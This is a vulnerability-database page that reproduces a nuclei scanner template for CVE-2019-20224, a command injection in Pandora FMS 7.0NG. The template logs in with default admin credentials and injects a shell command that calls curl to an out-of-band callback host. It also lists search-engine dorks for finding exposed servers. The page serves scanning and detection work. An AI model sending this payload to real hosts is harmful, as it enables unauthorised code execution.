Lucene search
K

Pandora FMS 7.0NG - Remote Command Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

Pandora FMS 7.0NG - Remote Command Injection, CVE-2019-2022

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Pandora 7.0NG - Remote Code Execution Exploit
11 Jan 202000:00
zdt
Circl
CVE-2019-20224
18 Jan 202013:24
circl
CNVD
Pandora FMS Remote Code Execution Vulnerability
13 Jan 202000:00
cnvd
Check Point Advisories
Pandora FMS Command Injection (CVE-2019-20224)
26 Jan 202000:00
checkpoint_advisories
CVE
CVE-2019-20224
9 Jan 202015:37
cve
Cvelist
CVE-2019-20224
9 Jan 202015:37
cvelist
Exploit DB
Pandora 7.0NG - Remote Code Execution
10 Jan 202000:00
exploitdb
exploitpack
Pandora 7.0NG - Remote Code Execution
10 Jan 202000:00
exploitpack
NVD
CVE-2019-20224
9 Jan 202016:15
nvd
OSV
CVE-2019-20224
9 Jan 202016:15
osv
Rows per page
id: CVE-2019-20224

info:
  name: Pandora FMS 7.0NG - Remote Command Injection
  author: ritikchaddha
  severity: high
  description: |
    Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system.
  remediation: This issue has been fixed in Pandora FMS 7.0 NG 742.
  reference:
    - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/
    - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9
    - https://nvd.nist.gov/vuln/detail/CVE-2019-20224
    - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view
    - https://pandorafms.com/downloads/solved-pandorafms-742.mp4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2019-20224
    cwe-id: CWE-78
    epss-score: 0.50615
    epss-percentile: 0.9878
    cpe: cpe:2.3:a:artica:pandora_fms:7.0_ng:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: artica
    product: pandora_fms
    shodan-query: http.title:"pandora fms"
    fofa-query: title="pandora fms"
    google-query: intitle:"pandora fms"
  tags: cve,cve2019,pandorafms,rce,authenticated,oast,artica,vuln

http:
  - raw:
      - |
        POST /pandora_console/index.php?login=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        nick=admin&pass=admin&login_button=Login
      - |
        POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        name: "http"
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204052d5fde5b4da0099fd2d17f8b1a96561317fbd1a5232ddcb86cdb34e7e1a0b022100928db4c715a8616567f68965cdb31837e6b9badc2de91a23ca2a962d22016067:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.18.8
CVSS 29
EPSS0.50615
26